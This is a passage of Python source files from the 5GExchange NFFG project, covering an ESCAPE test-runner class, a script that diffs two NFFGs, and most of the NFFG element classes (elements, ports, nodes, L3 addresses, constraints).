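# >>> runner.get_process_output_stream()  # pexpect buffer, e.g. 'hello\r\n'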
class ESCAPECommandRunner(CommandRunner):
"""
Extended CommandRunner class for ESCAPE.
Use threading.Event for signalling ESCAPE is up.
"""
ESC_PARAM_QUIT = "--quit"
ESC_PARAM_SERVICE = "--service"
def __init__ (self, *args, **kwargs):
super(ESCAPECommandRunner, self).__init__(*args, **kwargs)
self.__ready = threading.Event()
self.timeouted = False
@property
def timeout_exceeded (self):
return self.timeouted
def setup_verbose_logging (self):
log.debug("Detect VERBOSE mode --> Add more 'debug' flag")
self._command.extend(('--debug',) * 2)
def setup_standalone_mode (self):
log.debug("Detected standalone mode --> Disable timeout")
self.kill_timeout = None
log.debug("Remove quit mode, add ROS-API")
self._command.extend(("++quit", "--rosapi"))
def execute (self, wait_for_up=True):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
log.debug("\nStart program under test...")
log.debug(self._command)
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
if wait_for_up:
self._process.expect(pattern="ESCAPEv2 is up")
self.__ready.set()
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
self.timeouted = True
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e.message)
log.debug("\n\nError details:\n%s" % self._process.before)
self.kill_process()
def test (self, timeout=CommandRunner.KILL_TIMEOUT):
"""
Start a presumably simple process and test if the process is executed
successfully within the timeout interval or been killed.
:param timeout: use the given timeout instead of the default kill timeout
:type timeout: int
:return: the process is stopped successfully
:rtype: bool
"""
try:
proc = pexpect.spawn(self._command[0],
args=self._command[1:],
cwd=self._cwd,
timeout=timeout)
proc.expect(pexpect.EOF)
return True
except pexpect.ExceptionPexpect:
return False
def wait_for_ready (self):
log.debug("Waiting for ESCAPE...")
self.__ready.wait(timeout=self.kill_timeout)
log.debug("ESCAPE is up! ")
def kill_process (self):
# Call super explicitly because _process is defined in the parent class,
# so the process cannot be terminated from the child class
super(ESCAPECommandRunner, self).kill_process()
def stop (self):
# Call super explicitly because _process is defined in the parent class,
# so the process cannot be terminated from the child class
super(ESCAPECommandRunner, self).stop()
def reset(self):
log.debug("Reset %s status..." % self.__class__.__name__)
self.timeouted = False
self.__ready.clear()
class RunnableTestCaseInfo(object):
"""
Container class for storing the relevant information and config values of a
test case.
"""
CONFIG_FILE_NAME = "test-config.yaml"
CONFIG_CONTAINER_NAME = "test"
RUNNER_SCRIPT_NAME = "run.sh"
README_FILE_NAME = "README.txt"
def __init__ (self, case_path):
# Removing trailing slash
self.__case_path = os.path.normpath(case_path)
self.sub_name = None
log.debug("Reading testcase cfg from: %s" % self.full_testcase_path)
@property
def testcase_dir_name (self):
"""
:return: directory name of the test case
:rtype: str
"""
return os.path.basename(self.__case_path)
@property
def name (self):
if self.sub_name is not None:
return "%s-%s" % (self.testcase_dir_name, self.sub_name)
else:
return self.testcase_dir_name
@property
def full_testcase_path (self):
"""
:return: absolute path of the test case directory.
:rtype: str
"""
return self.__case_path
@property
def test_command (self):
"""
:return: absolute command path of the test case runner script.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.RUNNER_SCRIPT_NAME)
@property
def config_file_name (self):
"""
:return: absolute path of the test case config file.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.CONFIG_FILE_NAME)
def readme (self):
"""
:return: load the README file
:rtype: str
"""
with open(os.path.join(self.full_testcase_path,
self.README_FILE_NAME)) as f:
readme = f.read()
return readme if readme else ""
def load_test_case_class (self):
"""
:return: Return the TestCase class and its parameters defined in the
test case config file
:rtype: tuple(object, dict)
"""
test_args = {}
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
if self.CONFIG_CONTAINER_NAME in config:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
try:
m = test_args.pop('module')
c = test_args.pop('class')
return getattr(importlib.import_module(m), c), test_args
except (KeyError, ImportError):
pass
return None, test_args
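# Illustrative sketch of the expected test-config.yaml layout (values are
# assumptions; only the 'test' container and the 'module'/'class' keys are
# required by the code above, any extra keys become test_args):
#
#   test:
#     module: testframework.testcases   # importable module (assumption)
#     class: BasicSuccessfulTestCase    # TestCase class name (assumption)
#     timeout: 30                       # extra argument (assumption)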
def load_config (self):
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
try:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
return test_args
except KeyError:
pass
return None
def __repr__ (self):
return "RunnableTestCase [%s]" % self.testcase_dir_name
def clone (self):
return copy.deepcopy(self)
``` |
{
"source": "5GExchange/nffg",
"score": 3
} |
#### File: 5GExchange/nffg/nffg_diff.py
```python
import argparse
from nffg import NFFGToolBox, NFFG
def _calculate_diffs (old_path, new_path):
"""
Calculate and print the difference of the two :class:`NFFG` given by their paths.
:param old_path: file path of the original NFFG
:type old_path: str
:param new_path: file path of the modified NFFG
:type new_path: str
:return: None
"""
print "Calculate the difference NFFGs..."
old = NFFG.parse_from_file(old_path)
NFFGToolBox.recreate_all_sghops(nffg=old)
new = NFFG.parse_from_file(new_path)
NFFGToolBox.recreate_all_sghops(nffg=new)
add_nffg, del_nffg = NFFGToolBox.generate_difference_of_nffgs(old=old,
new=new,
ignore_infras=True)
print "\nADD NFFG:"
print add_nffg.dump()
print "\nDEL NFFG:"
print del_nffg.dump()
if __name__ == "__main__":
# Implement parser options
parser = argparse.ArgumentParser(description="Calculate differences of NFFGs",
add_help=True)
parser.add_argument("old", action="store", type=str, help="path for old NFFG")
parser.add_argument("new", action="store", type=str, help="path for new NFFG")
# Parsing arguments
args = parser.parse_args()
_calculate_diffs(old_path=args.old, new_path=args.new)
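# Illustrative invocation (hypothetical file names):
#   $ python nffg_diff.py old.nffg new.nffg
# prints the ADD and DEL NFFGs that transform 'old' into 'new'.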
```
#### File: 5GExchange/nffg/nffg_elements.py
```python
import json
import uuid
from collections import Iterable, OrderedDict
from itertools import chain
################################################################################
# ---------- BASE classes of NFFG elements -------------------
################################################################################
class Persistable(object):
"""
Define general persist function for the whole NFFG structure.
"""
__slots__ = ()
def persist (self):
"""
Common function to persist the actual element into a plain text format.
:return: generated empty object fit to JSON
:rtype: dict
"""
return OrderedDict()
def load (self, data, *args, **kwargs):
"""
Common function to fill self with data from JSON data.
:raise: :any:`exceptions.NotImplementedError`
:param data: object structure in JSON
:return: self
"""
pass
@classmethod
def parse (cls, data, *args, **kwargs):
"""
Common function to parse the given JSON object structure as the actual NF-FG
entity type and return a newly created object.
:param data: raw JSON object structure
:type data: object
:return: parsed data as the entity type
:rtype: :any:`Persistable`
"""
return cls().load(data, *args, **kwargs)
def copy (self):
"""
Return the copy of the object. This copy function is meant to be used when a
new ``NFFG`` object structure is created. It can handle the references
pointing to internal NFFG elements in order to avoid unnecessary deep copies.
These references are always None in the copied object and are overwritten by
adder functions in every case.
:return: copied object
:rtype: :any:`Element`
"""
from copy import deepcopy
return deepcopy(self)
class Element(Persistable):
"""
Main base class for NF-FG elements with unique id.
Contains the common functionality.
"""
# Operation constants
OP_CREATE = "create"
OP_REPLACE = "replace"
OP_MERGE = "merge"
OP_REMOVE = "remove"
OP_DELETE = "delete"
# Status constants
STATUS_INIT = "INITIALIZED"
STATUS_PENDING = "PENDING"
STATUS_DEPLOY = "DEPLOYED"
STATUS_RUN = "RUNNING"
STATUS_STOP = "STOPPED"
STATUS_FAIL = "FAILED"
__slots__ = ('id', 'type', 'operation', 'status')
def __init__ (self, id=None, type="ELEMENT", operation=None, status=None):
"""
Init.
:param id: optional identification (generated by default)
:type id: str or int
:param type: explicit object type both for nodes and edges
:type type: str
:return: None
"""
super(Element, self).__init__()
self.id = id if id is not None else self.generate_unique_id()
self.type = type
self.operation = operation
self.status = status
@staticmethod
def generate_unique_id ():
"""
Generate a unique id for the object based on uuid module: :rfc:`4122`.
:return: unique id
:rtype: str
"""
return str(uuid.uuid1())
def regenerate_id (self):
"""
Regenerate and set id. Useful for object copy.
:return: new id
:rtype: str
"""
self.id = self.generate_unique_id()
return self.id
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
# Need to override
element = super(Element, self).persist()
element['id'] = self.id
if self.operation is not None:
element["operation"] = self.operation
if self.status is not None:
element["status"] = self.status
return element
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
self.id = data['id']
super(Element, self).load(data=data)
self.operation = data.get("operation") # optional
self.status = data.get("status") # optional
return self
def dump (self):
"""
Dump the Element in a pretty format for debugging.
:return: Element in JSON format
:rtype: str
"""
return json.dumps(self.persist(), indent=2, sort_keys=False)
##############################################################################
# dict specific functions
##############################################################################
def __getitem__ (self, item):
"""
Return the attribute of the element given by ``item``.
:param item: attribute name
:type item: str or int
:return: attribute
:rtype: object
"""
if hasattr(self, item):
return getattr(self, item)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, item))
def __setitem__ (self, key, value):
"""
Set the attribute given by ``key`` with ``value``:
:param key: attribute name
:type key: str or int
:param value: new value
:type value: object
:return: new value
:rtype: object
"""
if hasattr(self, key):
return setattr(self, key, value)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, key))
def __contains__ (self, item):
"""
Return True if the given ``item`` exists.
:param item: searched attribute name
:type item: str or int
:return: whether the given item exists
:rtype: bool
"""
return hasattr(self, item)
def get (self, item, default=None):
"""
Return with the attribute given by ``item``, else ``default``.
:param item: searched attribute name
:type item: str
:param default: default value
:type default: object
:return: found attribute or default
:rtype: object
"""
try:
return self[item]
except KeyError:
return default
def setdefault (self, key, default=None):
"""
Set the attribute given by ``key``. Use the ``default`` value if it is
not already set.
:param key: attribute name
:type key: str or int
:param default: default value
:type default: object
:return: None
"""
if key not in self:
self[key] = default
def clear (self):
"""
Overridden for safety reasons.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError("This standard dict functions is not supported by NFFG!")
def update (self, dict2):
"""
Overridden for safety reasons.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError(
"This standard dict functions is not supported by NFFG! self: %s dict2: "
"%s" % (self, dict2))
class L3Address(Element):
"""
Wrapper class for storing L3 address values.
"""
__slots__ = ('name', 'configure', 'client', 'requested', 'provided')
def __init__ (self, id, name=None, configure=None, client=None,
requested=None, provided=None):
"""
Init.
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param configure: request address
:type configure: bool
:param client: client of the address request
:type client: str
:param requested: requested IP
:type requested: str
:param provided: provided IP
:type provided: str
:return: None
"""
super(L3Address, self).__init__(id=id, type="L3ADDRESS")
self.name = name
self.configure = configure
self.client = client
self.requested = requested
self.provided = provided
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(L3Address, self).load(data=data)
self.name = data.get('name')
self.configure = data.get('configure')
self.requested = data.get('requested')
self.provided = data.get('provided')
return self
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
l3 = super(L3Address, self).persist()
if self.name is not None:
l3['name'] = self.name
if self.configure is not None:
l3['configure'] = self.configure
if self.client is not None:
l3['client'] = self.client
if self.requested is not None:
l3['requested'] = self.requested
if self.provided is not None:
l3['provided'] = self.provided
return l3
class L3AddressContainer(Persistable):
"""
Container class for storing L3 address data.
"""
__slots__ = ('container',)
def __init__ (self, container=None):
"""
Init.
:param container: optional container for L3 addresses.
:type container: collection.Iterable
:return: None
"""
super(L3AddressContainer, self).__init__()
self.container = container if container is not None else []
def __getitem__ (self, id):
"""
Return with the :any:`L3Address` given by ``id``.
:param id: L3 address id
:type id: str or int
:return: L3 address
:rtype: :any:`L3Address`
"""
for l3 in self.container:
if l3.id == id:
return l3
raise KeyError("L3 address with id: %s is not defined!" % id)
def __iter__ (self):
"""
Return with an iterator over the container.
:return: iterator
:rtype: collection.Iterable
"""
return iter(self.container)
def __len__ (self):
"""
Return the number of stored :any:`L3Address`.
:return: number of addresses
:rtype: int
"""
return len(self.container)
def __contains__ (self, item):
"""
Return True if the given address object exists in the container.
:param item: address object
:type: :any:`L3Address`
:return: whether the address is present
:rtype: bool
"""
if not isinstance(item, L3Address):
raise RuntimeError(
"L3AddressContainer's operator \"in\" works only with L3Address "
"objects (and not ID-s!)")
return item in self.container
def append (self, item):
"""
Add a new address to the container.
:param item: address object
:type: :any:`L3Address`
:return: added address
:rtype: :any:`L3Address`
"""
self.container.append(item)
return item
def remove (self, item):
"""
Remove L3 address from container.
:param item: address object
:type: :any:`L3Address`
:return: removed address
:rtype: :any:`L3Address`
"""
return self.container.remove(item)
def clear (self):
"""
Remove all the stored address from container.
:return: None
"""
del self.container[:]
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return str(self.container)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return str(self)
def add_l3address (self, id, name=None, configure=None, client=None,
requested=None, provided=None):
"""
Add a new address to the container based on given :any:`L3Address`
attributes.
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param configure: request address
:type configure: bool
:param client: client of the address request
:type client: str
:param requested: requested IP
:type requested: str
:param provided: provided IP
:type provided: str
:return: None
"""
self.container.append(
L3Address(id, name=name, configure=configure, client=client,
requested=requested, provided=provided))
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
return [l3.persist() for l3 in self.container]
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
for item in data:
self.add_l3address(id=item['id'], name=item.get('name'),
configure=item.get('configure'),
client=item.get('client'),
requested=item.get('requested'),
provided=item.get('provided'))
class Port(Element):
"""
Class for storing a port of an NF.
"""
# Port type
TYPE = "PORT"
"""Port type"""
ROLE_CONSUMER = "consumer"
ROLE_PROVIDER = "provider"
ROLE_EXTERNAL = "EXTERNAL"
__slots__ = ('__node', 'properties', 'metadata', 'name', 'sap', 'capability',
'technology', 'role', 'delay', 'bandwidth', 'cost', 'qos',
'controller', 'orchestrator', 'l2', 'l3', 'l4')
def __init__ (self, node, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, role=None, delay=None,
bandwidth=None, cost=None, qos=None, controller=None,
orchestrator=None, l2=None, l4=None, metadata=None):
"""
Init.
:param node: container node
:type node: :any:`Node`
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param name: optional name
:type name: str
:param capability: optional capabilities
:type capability: str
:param sap: inter-domain SAP identifier
:type sap: str
:param technology: supported technologies
:type technology: str
:param delay: delay
:type delay: float
:param bandwidth: bandwidth
:type bandwidth: float
:param cost: cost
:type cost: str
:param qos: traffic QoS class
:type qos: str
:param controller: controller URL
:type controller: str
:param orchestrator: orchestrator URL
:type orchestrator: str
:param l2: l2 address
:type l2: str
:param l4: l4 fields
:type l4: str
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(Port, self).__init__(id=id, type=self.TYPE)
if not isinstance(node, Node):
raise RuntimeError("Port's container node must be derived from Node!")
self.__node = node
# Set properties list according to given param type
self.properties = OrderedDict(properties if properties else {})
self.metadata = OrderedDict(metadata if metadata else {})
# Virtualizer-related data
self.name = name
self.sap = sap
self.capability = capability
# sap_data
self.technology = technology
# sap_data/role
self.role = role
# sap_data/resources
self.delay = delay
self.bandwidth = bandwidth
self.cost = cost
self.qos = qos
# control
self.controller = controller
self.orchestrator = orchestrator
# addresses
self.l2 = l2
self.l3 = L3AddressContainer()
self.l4 = l4
@property
def node (self):
"""
Return with the container reference.
:return: container reference
:rtype: :any:`Persistable`
"""
return self.__node
def copy (self):
"""
Skip container ``node`` deepcopy in case the :any:`Port` object is copied
directly. Deepcopy called on an upper object has already cloned the
container node when it gets to a Port object and it will skip the re-cloning
due to its internal memoization feature.
:return: copied object
:rtype: :any:`Port`
"""
tmp, self.__node = self.__node, None
clone = super(Port, self).copy()
self.__node = tmp
return clone
@node.deleter
def node (self):
del self.__node
def add_property (self, property, value):
"""
Add a property to the :any:`Port`.
:param property: property
:type property: str
:param value: property value
:type value: str
:return: the Port object to allow function chaining
:rtype: :any:`Port`
"""
self.properties[property] = value
return self
def has_property (self, property):
"""
Return True if :any:`Port` has a property with given `property`.
:param property: property
:type property: str
:return: has a property with given name or not
:rtype: bool
"""
return property in self.properties
def del_property (self, property=None):
"""
Remove the property from the :any:`Port`. If no property is given all the
properties will be removed from the :any:`Port`.
:param property: property name
:type property: str
:return: removed property or None
:rtype: str or None
"""
if property is None:
self.properties.clear()
else:
return self.properties.pop(property, None)
def get_property (self, property):
"""
Return the value of property.
:param property: property
:type property: str
:return: the value of the property
:rtype: str
"""
return self.properties.get(property)
def add_metadata (self, name, value):
"""
Add metadata with the given `name`.
:param name: metadata name
:type name: str
:param value: metadata value
:type value: str
:return: the :any:`Port` object to allow function chaining
:rtype: :any:`Port`
"""
self.metadata[name] = value
return self
def has_metadata (self, name):
"""
Return True if the :any:`Port` has a metadata with the given `name`.
:param name: metadata name
:type name: str
:return: has metadata with given name or not
:rtype: bool
"""
return name in self.metadata
def del_metadata (self, name=None):
"""
Remove the metadata from the :any:`Port`. If no metadata is given all the
metadata will be removed.
:param name: name of the metadata
:type name: str
:return: removed metadata or None
:rtype: str or None
"""
if name is None:
self.metadata.clear()
else:
return self.metadata.pop(name, None)
def get_metadata (self, name):
"""
Return the value of metadata.
:param name: name of the metadata
:type name: str
:return: metadata value
:rtype: str
"""
return self.metadata.get(name)
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
port = super(Port, self).persist()
if self.properties:
port["property"] = self.properties.copy()
if self.name is not None:
port['name'] = self.name
if self.sap is not None:
port['sap'] = self.sap
if self.capability is not None:
port['capability'] = self.capability
if any(v is not None for v in (self.technology, self.role, self.delay,
self.bandwidth, self.cost)):
port['sap_data'] = {}
if self.technology is not None:
port['sap_data']['technology'] = self.technology
if self.role is not None:
port['sap_data']['role'] = self.role
if any(v is not None for v in (self.delay, self.bandwidth, self.cost)):
port['sap_data']['resources'] = {}
if self.delay is not None:
port['sap_data']['resources']['delay'] = self.delay
if self.bandwidth is not None:
port['sap_data']['resources']['bandwidth'] = self.bandwidth
if self.cost is not None:
port['sap_data']['resources']['cost'] = self.cost
if self.qos is not None:
port['sap_data']['resources']['qos'] = self.qos
if any(v is not None for v in (self.controller, self.orchestrator)):
port['control'] = {}
if self.controller is not None:
port['control']['controller'] = self.controller
if self.orchestrator is not None:
port['control']['orchestrator'] = self.orchestrator
if any(v is not None for v in
(self.l2, self.l4, True if self.l3 else None)):
port['addresses'] = {}
if self.l2 is not None:
port['addresses']['l2'] = self.l2
if self.l4 is not None:
port['addresses']['l4'] = self.l4
if len(self.l3):
port['addresses']['l3'] = self.l3.persist()
if self.metadata:
port["metadata"] = self.metadata.copy()
return port
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Port, self).load(data=data)
self.properties = OrderedDict(data.get('property', ()))
self.sap = data.get('sap')
self.name = data.get('name')
self.capability = data.get('capability')
if 'sap_data' in data:
self.technology = data['sap_data'].get('technology')
self.role = data['sap_data'].get('role')
if 'resources' in data['sap_data']:
self.delay = data['sap_data']['resources'].get('delay')
self.bandwidth = data['sap_data']['resources'].get('bandwidth')
self.cost = data['sap_data']['resources'].get('cost')
self.qos = data['sap_data']['resources'].get('qos')
else:
self.technology = self.role = self.delay = self.bandwidth = self.cost = self.qos = None
if 'control' in data:
self.controller = data['control'].get('controller')
self.orchestrator = data['control'].get('orchestrator')
else:
self.controller = self.orchestrator = None
if 'addresses' in data:
self.l2 = data['addresses'].get('l2')
self.l3.load(data=data['addresses'].get('l3', ()))
self.l4 = data['addresses'].get('l4')
else:
self.l2 = self.l4 = None
self.metadata = OrderedDict(data.get('metadata', ()))
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "%s(node: %s, id: %s)" % (
self.__class__.__name__, self.node.id, self.id)
class PortContainer(Persistable):
"""
Basic container class for ports.
Implements a Container-like behavior for getting a Port with id:
>>> cont = PortContainer()
>>> ...
>>> cont["port_id"]
"""
__slots__ = ('container',)
def __init__ (self, container=None):
"""
Init.
:param container: use given container for init
:type container: :any:`collections.Container`
"""
self.container = container if container is not None else []
def __getitem__ (self, id):
"""
Return with the :any:`Port` given by ``id``.
:param id: port id
:type id: str or int
:return: port object
:rtype: :any:`Port`
"""
for port in self.container:
if port.id == id:
return port
raise KeyError("Port with id: %s is not defined in: %s!"
% (id, [p.id for p in self.container]))
def __iter__ (self):
"""
Return with an iterator over the container.
:return: iterator
:rtype: collection.Iterable
"""
return iter(self.container)
def __len__ (self):
"""
Return the number of stored :any:`Port`.
:return: number of ports
:rtype: int
"""
return len(self.container)
def __contains__ (self, item):
"""
Return True if the given port (a :any:`Port` object or a port id) exists in
the container.
:param item: port object or port id
:type: :any:`Port` or str or int
:return: whether the port is present
:rtype: bool
"""
# this type checking is important because with Port ID input the function
# would silently return False!
if isinstance(item, Port):
return item in self.container
else:
return item in (p.id for p in self.container)
@property
def flowrules (self):
"""
Return with an iterator over the flowrules stored in the ports.
:return: iterator of flowrules
:rtype: collections.Iterator
"""
return chain(*[port.flowrules for port in self.container])
def append (self, item):
"""
Add new port object to the container.
:param item: port object
:type item: :any:`Port`
:return: added object
:rtype: :any:`Port`
"""
self.container.append(item)
return item
def remove (self, item):
"""
Remove port object from the container.
:param item: port object
:type item: :any:`Port`
:return: None
"""
try:
return self.container.remove(item)
except ValueError:
return
def clear (self):
"""
Remove all the stored objects.
:return: None
"""
del self.container[:]
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return str(self.container)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return str(self)
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
return [port.persist() for port in self.container]
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
pass
class Constraints(Persistable):
"""
Container class for constraints.
"""
__slots__ = ('affinity', 'antiaffinity', 'variable', 'constraint',
'restorability')
def __init__ (self):
"""
Init.
"""
super(Constraints, self).__init__()
self.affinity = OrderedDict()
self.antiaffinity = OrderedDict()
self.variable = OrderedDict()
self.constraint = OrderedDict()
self.restorability = None
def add_affinity (self, id, value):
"""
Set affinity value.
:param id: unique ID
:type id: str or int
:param value: new value
:type value: str or int
:return: new value
:rtype: str or int
"""
self.affinity[id] = value
return value
def has_affinity (self, id):
"""
Return True if an affinity value with the given id exists.
:param id: unique ID
:type id: str or int
:return: value exists or not
:rtype: bool
"""
return id in self.affinity
def del_affinity (self, id):
"""
Remove affinity value with given id.
:param id: unique ID
:type id: str or int
:return: removed value
:rtype: str or int
"""
return self.affinity.pop(id, None)
def add_antiaffinity (self, id, value):
"""
Set antiaffinity value.
:param id: unique ID
:type id: str or int
:param value: new value
:type value: str or int
:return: new value
:rtype: str or int
"""
self.antiaffinity[id] = value
return value
def has_antiaffinity (self, id):
"""
Return True if an antiaffinity value with the given id exists.
:param id: unique ID
:type id: str or int
:return: value exists or not
:rtype: bool
"""
return id in self.antiaffinity
def del_antiaffinity (self, id):
"""
Remove antiaffinity value with given id.
:param id: unique ID
:type id: str or int
:return: removed value
:rtype: str or int
"""
return self.antiaffinity.pop(id, None)
def add_variable (self, key, id):
"""
Set variable value.
:param key: unique key
:type key: str or int
:param id: new value
:type id: str or int
:return: new value
:rtype: str or int
"""
self.variable[key] = id
return id
def has_variable (self, key):
"""
Return True if a variable value with the given key exists.
:param key: unique key
:type key: str or int
:return: value exists or not
:rtype: bool
"""
return key in self.variable
def del_variable (self, key):
"""
Remove variable value with given key.
:param key: unique key
:type key: str or int
:return: removed value
:rtype: str or int
"""
return self.variable.pop(key, None)
def add_constraint (self, id, formula):
"""
Set constraint value.
:param id: unique ID
:type id: str or int
:param formula: new value
:type formula: str or int
:return: new value
:rtype: str or int
"""
self.constraint[id] = formula
return formula
def has_constraint (self, id):
"""
Return True if a constraint value with the given id exists.
:param id: unique ID
:type id: str or int
:return: value exists or not
:rtype: bool
"""
return id in self.constraint
def del_constraint (self, id):
"""
Remove constraint value with given id.
:param id: unique ID
:type id: str or int
:return: removed value
:rtype: str or int
"""
if id in self.constraint:
return self.constraint.pop(id)
else:
return None
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
constraints = super(Constraints, self).persist()
if self.affinity:
constraints['affinity'] = self.affinity
if self.antiaffinity:
constraints['antiaffinity'] = self.antiaffinity
if self.variable:
constraints['variable'] = self.variable
if self.constraint:
constraints['constraint'] = self.constraint
if self.restorability:
constraints['restorability'] = self.restorability
return constraints
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Constraints, self).load(data=data)
self.affinity = data.get('affinity', OrderedDict())
self.antiaffinity = data.get('antiaffinity', OrderedDict())
self.variable = data.get('variable', OrderedDict())
self.constraint = data.get('constraint', OrderedDict())
self.restorability = data.get('restorability')
return self
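# Illustrative sketch (not part of the original module): constraints are plain
# id -> value mappings and only non-empty ones are persisted, e.g.
# >>> c = Constraints()
# >>> c.add_affinity("nf1", "nf2")   # 'nf2'
# >>> c.has_affinity("nf1")          # True
# >>> c.persist()                    # {'affinity': {'nf1': 'nf2'}} (OrderedDict)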
class Node(Element):
"""
Base class for different types of nodes in the NF-FG.
"""
# Class of the contained ports
PORT_CLASS = Port
"""Class of the contained ports"""
# Node type constants:
# Infrastructure node --> abstract node represents one or more physical node
INFRA = "INFRA"
# SAP nodes --> abstract node represents end point/ports of a service
SAP = "SAP"
# Network Function (NF) node --> abstract node represents a virtual function
NF = "NF"
__slots__ = ('name', 'ports', 'metadata', 'constraints')
def __init__ (self, type, id=None, name=None, metadata=None):
"""
Init.
:param type: node type
:type type: str
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(Node, self).__init__(id=id, type=type)
self.name = name if name is not None else str(id) # optional
self.ports = PortContainer() # list of Ports
self.metadata = OrderedDict(metadata if metadata else {})
self.constraints = Constraints()
@property
def short_name (self):
"""
Return a generic short name.
:return: short name
:rtype: str
"""
return self.name if self.name else "id: %s" % self.id
def flowrules (self):
"""
Return with an iterator over the flowrules stored in the ports.
:return: iterator of flowrules
:rtype: collections.Iterator
"""
return self.ports.flowrules
def add_port (self, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, delay=None, bandwidth=None,
cost=None, controller=None, orchestrator=None, l2=None, l4=None,
metadata=None):
"""
Add a port with the given params to the :any:`Node`.
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param name: optional name
:type name: str
:param sap: inter-domain SAP identifier
:type sap: str
:param capability: optional capabilities
:type capability: str
:param technology: supported technologies
:type technology: str
:param delay: delay
:type delay: float
:param bandwidth: bandwidth
:type bandwidth: float
:param cost: cost
:type cost: str
:param controller: controller URL
:type controller: str
:param orchestrator: orchestrator URL
:type orchestrator: str
:param l2: l2 address
:type l2: str
:param l4: l4 fields
:type l4: str
:param metadata: metadata related to Node
:type metadata: dict
:return: newly created and stored Port object
:rtype: :any:`Port`
"""
port = Port(node=self, id=id, name=name, properties=properties, sap=sap,
capability=capability, technology=technology, delay=delay,
bandwidth=bandwidth, cost=cost, controller=controller,
orchestrator=orchestrator, l2=l2, l4=l4, metadata=metadata)
self.ports.append(port)
return port
def del_port (self, id):
"""
Remove the port with the given id from the Node.
:param id: port id
:type id: int or str
:return: whether the Port was found and removed
:rtype: bool
"""
for port in self.ports:
if port.id == id:
del port.node
return self.ports.remove(port)
return False
def has_port (self, id):
"""
Return True if the :any:`Node` has a port with the given `id`.
:param id: optional id
:type id: str or int
:return: has port with given id or not
:rtype: bool
"""
for p in self.ports:
if p.id == id:
return True
return False
def add_metadata (self, name, value):
"""
Add metadata with the given `name`.
:param name: metadata name
:type name: str
:param value: metadata value
:type value: str
:return: the :any:`Node` object to allow function chaining
:rtype: :any:`Node`
"""
self.metadata[name] = value
return self
def has_metadata (self, name):
"""
Return True if the :any:`Node` has a metadata with the given `name`.
:param name: metadata name
:type name: str
:return: has metadata with given name or not
:rtype: bool
"""
return name in self.metadata
def del_metadata (self, name=None):
"""
Remove the metadata from the :any:`Node`. If no metadata is given all the
metadata will be removed.
:param name: name of the metadata
:type name: str
:return: removed metadata or None
:rtype: str or None
"""
if name is None:
self.metadata.clear()
else:
return self.metadata.pop(name, None)
def get_metadata (self, name):
"""
Return the value of metadata.
:param name: name of the metadata
:type name: str
:return: metadata value
:rtype: str
"""
return self.metadata.get(name)
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
node = super(Node, self).persist()
if self.name is not None:
node["name"] = self.name
ports = self.ports.persist()
if ports:
node["ports"] = ports
if self.metadata:
node["metadata"] = self.metadata.copy()
constraints = self.constraints.persist()
if constraints:
node['constraints'] = constraints
return node
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Node, self).load(data=data)
self.name = data.get('name') # optional
for item in data.get('ports', ()):
port = self.PORT_CLASS(node=self)
port.load(data=item)
self.ports.append(port)
self.metadata = OrderedDict(data.get('metadata', ()))
if 'constraints' in data:
self.constraints.load(data=data['constraints'])
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "<|ID: %s, Type: %s --> %s|>" % (
